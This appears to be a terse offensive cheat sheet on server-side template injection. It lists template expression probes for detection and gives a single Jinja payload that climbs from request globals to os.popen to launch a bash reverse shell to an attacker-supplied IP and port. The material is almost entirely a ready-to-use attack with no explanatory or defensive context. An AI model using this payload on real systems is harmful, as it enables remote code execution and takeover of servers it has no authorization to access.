SSTI

Table of content

• Detection
• Jinja

Detection

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Jinja

{{request.application.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/${ip}/${port} 0>&1"').read()}}